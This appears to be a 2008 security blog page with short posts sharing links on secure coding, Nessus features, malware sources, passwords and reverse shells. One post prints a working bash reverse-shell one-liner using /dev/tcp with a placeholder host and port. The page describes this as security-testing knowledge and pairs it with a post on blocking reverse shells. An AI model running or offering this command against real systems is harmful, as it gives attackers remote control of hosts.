Tips

Taxonomy of coding errors…

by kriggins on July 16, 2008

in Educational, General, Tips

A quick note about something that @cji tweeted about.

Fortify has a taxonomy of coding errors that affect security. The really cool thing is the examples in many different languages.

Its right here, go check it out.

{ 0 comments }

How to become a hacker…

by kriggins on May 16, 2008

in Tips

You may have all seen this already, but I just came across it. It's been around for a while, but I thought it was interesting. How to Become a Hacker by Eric Steven Raymond.

{ 0 comments }

Hey Nessus, do you do sudo?

by kriggins on May 16, 2008

in Security testing, Tips, Tools

We all know and love Nessus. Well today, Tenable made it even better. Nessus now fully supports su and sudo for audit and patch compliance checks. This is very cool.

Next, in response to the ssh key bruhaha this week, there are now a couple of plugins that will check for weak keys in SSH and SSL protected webservers.

Caveat: It appears that you need to be Direct Feed/Professional subscriber to use these features.

Kevin

{ 0 comments }

Protecting against reverse shell wickedness…

by kriggins on April 21, 2008

in Tips

In this post, I referenced a very interesting article over at Neohapsis about easily setting up a reverse shell using just the bash shell. Well there is a new post up which talks about the flip side of the equation; How to stop reverse shells.

Like the first post, this one is also a good read.

{ 0 comments }

Bash based reverse shell wickedness

by kriggins on April 17, 2008

in Security testing, Tips, Tools

ShellNeohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell.  Used to be you could remove netcat, wget, ftp, etc... and make it much more difficult for a reverse shell to be started.  Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins

{ 1 comment }

Malware Threat Center – Great Source

by kriggins on April 15, 2008

in General, Tips

Pubal posted a note on Twitter this morning pointing to the Malware Threat Center.  The site has some great information that can be used to help protect your networks from known sources of malware.

Kevin Riggins

{ 0 comments }

srcasm posted a great method for generating and remembering unique secure passwords here - How to keep your password hidden in plain sight… | Srcasm

You really need to go read it. It is one of easiest methods I have seen.

{ 0 comments }